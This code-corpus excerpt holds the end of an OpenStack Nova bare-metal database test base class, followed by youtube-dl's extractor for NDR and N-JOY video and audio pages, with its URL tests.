# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Bare-metal DB test base class."""
from oslo.config import cfg
from nova import context as nova_context
from nova import test
from nova.virt.baremetal.db import migration as bm_migration
from nova.virt.baremetal.db.sqlalchemy import session as bm_session
_DB_CACHE = None
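# Module-level cache so the sqlite test database fixture is set up only once
# per test process; subsequent BMDBTestCase instances reuse it.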
CONF = cfg.CONF
CONF.import_opt('sql_connection',
'nova.virt.baremetal.db.sqlalchemy.session',
group='baremetal')
class Database(test.Database):
def post_migrations(self):
pass
class BMDBTestCase(test.TestCase):
def setUp(self):
super(BMDBTestCase, self).setUp()
self.flags(sql_connection='sqlite://', group='baremetal')
global _DB_CACHE
if not _DB_CACHE:
_DB_CACHE = Database(bm_session, bm_migration,
sql_connection=CONF.baremetal.sql_connection,
sqlite_db=None,
sqlite_clean_db=None)
self.useFixture(_DB_CACHE)
self.context = nova_context.get_admin_context()
| apache-2.0 |
epitron/youtube-dl | youtube_dl/extractor/ndr.py | 17 | 14346 | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
determine_ext,
int_or_none,
parse_iso8601,
qualities,
)
class NDRBaseIE(InfoExtractor):
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
display_id = next(group for group in mobj.groups() if group)
webpage = self._download_webpage(url, display_id)
return self._extract_embed(webpage, display_id)
class NDRIE(NDRBaseIE):
IE_NAME = 'ndr'
IE_DESC = 'NDR.de - Norddeutscher Rundfunk'
_VALID_URL = r'https?://(?:www\.)?ndr\.de/(?:[^/]+/)*(?P<id>[^/?#]+),[\da-z]+\.html'
_TESTS = [{
# httpVideo, same content id
'url': 'http://www.ndr.de/fernsehen/Party-Poette-und-Parade,hafengeburtstag988.html',
'md5': '6515bc255dc5c5f8c85bbc38e035a659',
'info_dict': {
'id': 'hafengeburtstag988',
'display_id': 'Party-Poette-und-Parade',
'ext': 'mp4',
'title': 'Party, Pötte und Parade',
'description': 'md5:ad14f9d2f91d3040b6930c697e5f6b4c',
'uploader': 'ndrtv',
'timestamp': 1431108900,
'upload_date': '20150510',
'duration': 3498,
},
'params': {
'skip_download': True,
},
}, {
# httpVideo, different content id
'url': 'http://www.ndr.de/sport/fussball/40-Osnabrueck-spielt-sich-in-einen-Rausch,osna270.html',
'md5': '1043ff203eab307f0c51702ec49e9a71',
'info_dict': {
'id': 'osna272',
'display_id': '40-Osnabrueck-spielt-sich-in-einen-Rausch',
'ext': 'mp4',
'title': 'Osnabrück - Wehen Wiesbaden: Die Highlights',
'description': 'md5:32e9b800b3d2d4008103752682d5dc01',
'uploader': 'ndrtv',
'timestamp': 1442059200,
'upload_date': '20150912',
'duration': 510,
},
'params': {
'skip_download': True,
},
}, {
# httpAudio, same content id
'url': 'http://www.ndr.de/info/La-Valette-entgeht-der-Hinrichtung,audio51535.html',
'md5': 'bb3cd38e24fbcc866d13b50ca59307b8',
'info_dict': {
'id': 'audio51535',
'display_id': 'La-Valette-entgeht-der-Hinrichtung',
'ext': 'mp3',
'title': 'La Valette entgeht der Hinrichtung',
'description': 'md5:22f9541913a40fe50091d5cdd7c9f536',
'uploader': 'ndrinfo',
'timestamp': 1290626100,
'upload_date': '20140729',
'duration': 884,
},
'params': {
'skip_download': True,
},
}, {
'url': 'https://www.ndr.de/Fettes-Brot-Ferris-MC-und-Thees-Uhlmann-live-on-stage,festivalsommer116.html',
'only_matching': True,
}]
def _extract_embed(self, webpage, display_id):
embed_url = self._html_search_meta(
'embedURL', webpage, 'embed URL', fatal=True)
description = self._search_regex(
r'<p[^>]+itemprop="description">([^<]+)</p>',
webpage, 'description', default=None) or self._og_search_description(webpage)
timestamp = parse_iso8601(
self._search_regex(
r'<span[^>]+itemprop="(?:datePublished|uploadDate)"[^>]+content="([^"]+)"',
webpage, 'upload date', fatal=False))
return {
'_type': 'url_transparent',
'url': embed_url,
'display_id': display_id,
'description': description,
'timestamp': timestamp,
}
class NJoyIE(NDRBaseIE):
IE_NAME = 'njoy'
IE_DESC = 'N-JOY'
_VALID_URL = r'https?://(?:www\.)?n-joy\.de/(?:[^/]+/)*(?:(?P<display_id>[^/?#]+),)?(?P<id>[\da-z]+)\.html'
_TESTS = [{
# httpVideo, same content id
'url': 'http://www.n-joy.de/entertainment/comedy/comedy_contest/Benaissa-beim-NDR-Comedy-Contest,comedycontest2480.html',
'md5': 'cb63be60cd6f9dd75218803146d8dc67',
'info_dict': {
'id': 'comedycontest2480',
'display_id': 'Benaissa-beim-NDR-Comedy-Contest',
'ext': 'mp4',
'title': 'Benaissa beim NDR Comedy Contest',
'description': 'md5:f057a6c4e1c728b10d33b5ffd36ddc39',
'uploader': 'ndrtv',
'upload_date': '20141129',
'duration': 654,
},
'params': {
'skip_download': True,
},
}, {
# httpVideo, different content id
'url': 'http://www.n-joy.de/musik/Das-frueheste-DJ-Set-des-Nordens-live-mit-Felix-Jaehn-,felixjaehn168.html',
'md5': '417660fffa90e6df2fda19f1b40a64d8',
'info_dict': {
'id': 'dockville882',
'display_id': 'Das-frueheste-DJ-Set-des-Nordens-live-mit-Felix-Jaehn-',
'ext': 'mp4',
'title': '"Ich hab noch nie" mit Felix Jaehn',
'description': 'md5:85dd312d53be1b99e1f998a16452a2f3',
'uploader': 'njoy',
'upload_date': '20150822',
'duration': 211,
},
'params': {
'skip_download': True,
},
}, {
'url': 'http://www.n-joy.de/radio/webradio/morningshow209.html',
'only_matching': True,
}]
def _extract_embed(self, webpage, display_id):
video_id = self._search_regex(
r'<iframe[^>]+id="pp_([\da-z]+)"', webpage, 'embed id')
description = self._search_regex(
r'<div[^>]+class="subline"[^>]*>[^<]+</div>\s*<p>([^<]+)</p>',
webpage, 'description', fatal=False)
return {
'_type': 'url_transparent',
'ie_key': 'NDREmbedBase',
'url': 'ndr:%s' % video_id,
'display_id': display_id,
'description': description,
}
class NDREmbedBaseIE(InfoExtractor):
IE_NAME = 'ndr:embed:base'
_VALID_URL = r'(?:ndr:(?P<id_s>[\da-z]+)|https?://www\.ndr\.de/(?P<id>[\da-z]+)-ppjson\.json)'
_TESTS = [{
'url': 'ndr:soundcheck3366',
'only_matching': True,
}, {
'url': 'http://www.ndr.de/soundcheck3366-ppjson.json',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id') or mobj.group('id_s')
ppjson = self._download_json(
'http://www.ndr.de/%s-ppjson.json' % video_id, video_id)
playlist = ppjson['playlist']
formats = []
quality_key = qualities(('xs', 's', 'm', 'l', 'xl'))
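        # qualities() returns a ranking function: known labels map to their
        # index ('xs' -> 0 ... 'xl' -> 4) and unknown labels rank lowest.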
for format_id, f in playlist.items():
src = f.get('src')
if not src:
continue
ext = determine_ext(src, None)
if ext == 'f4m':
formats.extend(self._extract_f4m_formats(
src + '?hdcore=3.7.0&plugin=aasp-3.7.0.39.44', video_id,
f4m_id='hds', fatal=False))
elif ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
src, video_id, 'mp4', m3u8_id='hls',
entry_protocol='m3u8_native', fatal=False))
else:
quality = f.get('quality')
ff = {
'url': src,
'format_id': quality or format_id,
'quality': quality_key(quality),
}
type_ = f.get('type')
if type_ and type_.split('/')[0] == 'audio':
ff['vcodec'] = 'none'
ff['ext'] = ext or 'mp3'
formats.append(ff)
self._sort_formats(formats)
config = playlist['config']
        live = config.get('streamType') in ['httpVideoLive', 'httpAudioLive']
title = config['title']
if live:
title = self._live_title(title)
uploader = ppjson.get('config', {}).get('branding')
upload_date = ppjson.get('config', {}).get('publicationDate')
duration = int_or_none(config.get('duration'))
thumbnails = [{
'id': thumbnail.get('quality') or thumbnail_id,
'url': thumbnail['src'],
'preference': quality_key(thumbnail.get('quality')),
} for thumbnail_id, thumbnail in config.get('poster', {}).items() if thumbnail.get('src')]
return {
'id': video_id,
'title': title,
'is_live': live,
'uploader': uploader if uploader != '-' else None,
'upload_date': upload_date[0:8] if upload_date else None,
'duration': duration,
'thumbnails': thumbnails,
'formats': formats,
}
class NDREmbedIE(NDREmbedBaseIE):
IE_NAME = 'ndr:embed'
_VALID_URL = r'https?://(?:www\.)?ndr\.de/(?:[^/]+/)*(?P<id>[\da-z]+)-(?:player|externalPlayer)\.html'
_TESTS = [{
'url': 'http://www.ndr.de/fernsehen/sendungen/ndr_aktuell/ndraktuell28488-player.html',
'md5': '8b9306142fe65bbdefb5ce24edb6b0a9',
'info_dict': {
'id': 'ndraktuell28488',
'ext': 'mp4',
'title': 'Norddeutschland begrüßt Flüchtlinge',
'is_live': False,
'uploader': 'ndrtv',
'upload_date': '20150907',
'duration': 132,
},
}, {
'url': 'http://www.ndr.de/ndr2/events/soundcheck/soundcheck3366-player.html',
'md5': '002085c44bae38802d94ae5802a36e78',
'info_dict': {
'id': 'soundcheck3366',
'ext': 'mp4',
'title': 'Ella Henderson braucht Vergleiche nicht zu scheuen',
'is_live': False,
'uploader': 'ndr2',
'upload_date': '20150912',
'duration': 3554,
},
'params': {
'skip_download': True,
},
}, {
'url': 'http://www.ndr.de/info/audio51535-player.html',
'md5': 'bb3cd38e24fbcc866d13b50ca59307b8',
'info_dict': {
'id': 'audio51535',
'ext': 'mp3',
'title': 'La Valette entgeht der Hinrichtung',
'is_live': False,
'uploader': 'ndrinfo',
'upload_date': '20140729',
'duration': 884,
},
'params': {
'skip_download': True,
},
}, {
'url': 'http://www.ndr.de/fernsehen/sendungen/visite/visite11010-externalPlayer.html',
'md5': 'ae57f80511c1e1f2fd0d0d3d31aeae7c',
'info_dict': {
'id': 'visite11010',
'ext': 'mp4',
'title': 'Visite - die ganze Sendung',
'is_live': False,
'uploader': 'ndrtv',
'upload_date': '20150902',
'duration': 3525,
},
'params': {
'skip_download': True,
},
}, {
# httpVideoLive
'url': 'http://www.ndr.de/fernsehen/livestream/livestream217-externalPlayer.html',
'info_dict': {
'id': 'livestream217',
'ext': 'flv',
'title': r're:^NDR Fernsehen Niedersachsen \d{4}-\d{2}-\d{2} \d{2}:\d{2}$',
'is_live': True,
'upload_date': '20150910',
},
'params': {
'skip_download': True,
},
}, {
'url': 'http://www.ndr.de/ndrkultur/audio255020-player.html',
'only_matching': True,
}, {
'url': 'http://www.ndr.de/fernsehen/sendungen/nordtour/nordtour7124-player.html',
'only_matching': True,
}, {
'url': 'http://www.ndr.de/kultur/film/videos/videoimport10424-player.html',
'only_matching': True,
}, {
'url': 'http://www.ndr.de/fernsehen/sendungen/hamburg_journal/hamj43006-player.html',
'only_matching': True,
}, {
'url': 'http://www.ndr.de/fernsehen/sendungen/weltbilder/weltbilder4518-player.html',
'only_matching': True,
}, {
'url': 'http://www.ndr.de/fernsehen/doku952-player.html',
'only_matching': True,
}]
class NJoyEmbedIE(NDREmbedBaseIE):
IE_NAME = 'njoy:embed'
_VALID_URL = r'https?://(?:www\.)?n-joy\.de/(?:[^/]+/)*(?P<id>[\da-z]+)-(?:player|externalPlayer)_[^/]+\.html'
_TESTS = [{
# httpVideo
'url': 'http://www.n-joy.de/events/reeperbahnfestival/doku948-player_image-bc168e87-5263-4d6d-bd27-bb643005a6de_theme-n-joy.html',
'md5': '8483cbfe2320bd4d28a349d62d88bd74',
'info_dict': {
'id': 'doku948',
'ext': 'mp4',
'title': 'Zehn Jahre Reeperbahn Festival - die Doku',
'is_live': False,
'upload_date': '20150807',
'duration': 1011,
},
}, {
# httpAudio
'url': 'http://www.n-joy.de/news_wissen/stefanrichter100-player_image-d5e938b1-f21a-4b9a-86b8-aaba8bca3a13_theme-n-joy.html',
'md5': 'd989f80f28ac954430f7b8a48197188a',
'info_dict': {
'id': 'stefanrichter100',
'ext': 'mp3',
'title': 'Interview mit einem Augenzeugen',
'is_live': False,
'uploader': 'njoy',
'upload_date': '20150909',
'duration': 140,
},
'params': {
'skip_download': True,
},
}, {
# httpAudioLive, no explicit ext
'url': 'http://www.n-joy.de/news_wissen/webradioweltweit100-player_image-3fec0484-2244-4565-8fb8-ed25fd28b173_theme-n-joy.html',
'info_dict': {
'id': 'webradioweltweit100',
'ext': 'mp3',
'title': r're:^N-JOY Weltweit \d{4}-\d{2}-\d{2} \d{2}:\d{2}$',
'is_live': True,
'uploader': 'njoy',
'upload_date': '20150810',
},
'params': {
'skip_download': True,
},
}, {
'url': 'http://www.n-joy.de/musik/dockville882-player_image-3905259e-0803-4764-ac72-8b7de077d80a_theme-n-joy.html',
'only_matching': True,
}, {
'url': 'http://www.n-joy.de/radio/sendungen/morningshow/urlaubsfotos190-player_image-066a5df1-5c95-49ec-a323-941d848718db_theme-n-joy.html',
'only_matching': True,
}, {
'url': 'http://www.n-joy.de/entertainment/comedy/krudetv290-player_image-ab261bfe-51bf-4bf3-87ba-c5122ee35b3d_theme-n-joy.html',
'only_matching': True,
}]
| unlicense |